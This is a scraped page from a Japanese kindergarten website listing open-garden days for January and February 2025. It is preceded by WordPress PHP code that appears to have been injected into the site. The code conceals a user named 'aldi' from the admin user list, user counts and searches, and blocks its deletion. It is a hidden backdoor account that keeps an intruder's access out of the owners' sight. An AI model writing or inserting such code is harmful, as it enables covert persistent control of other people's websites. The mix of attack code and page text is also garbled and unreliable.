add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'aldi'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'aldi'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'aldi') { wp_die( __('User aldi tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'aldi'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'aldi'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; }); 園庭開放のお知らせ-2025年1~2月 | 学校法人安田学園 新生幼稚園 園庭開放のお知らせ-2025年1~2月 | 学校法人安田学園 新生幼稚園

    園庭開放のお知らせ-2025年1~2月

    2025年1~2月の園庭開放日をお知らせいたします。
    親子で自由に園庭をお使い下さい。
    雨天の時などは、図書室の絵本コーナーで絵本を見ていただくこともできます。
    いずれも10:00~12:00です。
    予約不要です。
    園庭横の駐車場(16台分)をご利用いただけます。
     
    2025年
    1月10日(金)
    1月31日(金)
    2月7日(金)
    2月14日(金)
    2月21日(金)
    2月28日(金) 
    3~4月の園庭開放はありません。次回は5月を予定しています。

    2024年12月18日
ページ上部へ
ページ上部へ